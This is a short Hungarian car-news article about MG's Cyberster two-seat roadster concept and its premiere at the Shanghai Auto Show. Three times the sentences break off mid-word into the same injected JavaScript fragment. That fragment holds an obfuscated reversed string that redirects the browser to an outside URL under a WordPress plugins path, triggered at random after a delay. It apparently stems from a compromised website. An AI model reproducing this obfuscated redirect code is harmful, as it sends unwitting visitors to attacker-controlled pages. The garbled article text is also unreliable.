Az április 19-én nyitó Sanghaji Autószalonon tartja új sportautó-tanulmányának világpremierjét az MG. Az egykori sportmárka sokkal tartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozik Kínának, 2006-ban a SAIC csoport mentette meg a végső csődtől. Az elmúlt tizenöt évben stabilizálták a márka működését, 2020-ban pedig elindítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tották nyugat-európai terjeszkedését is. Az MG mostanában nem gyárt sportautókat, elektromos szabadidőjárműveket annál inkább, a Cyberster tanulmány azonban arra enged következtetni, hogy ezen váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toztatnának. A kétüléses roadster-koncepció nem véletlenül kapta a nevét: olyan merész részletekkel ejt ámulatba, mint az oldalfalon végigfutó LED-sáv, a klasszikus bukólámpákat újraértelmező ‘varázsszem’ fényszórók, az integrált irányjelző fülekkel szerelt, amorf kormány, az ülések mögötti, rejtélyes sugárhajtómű-idomok, vagy az utasteret…
- Hirdetés -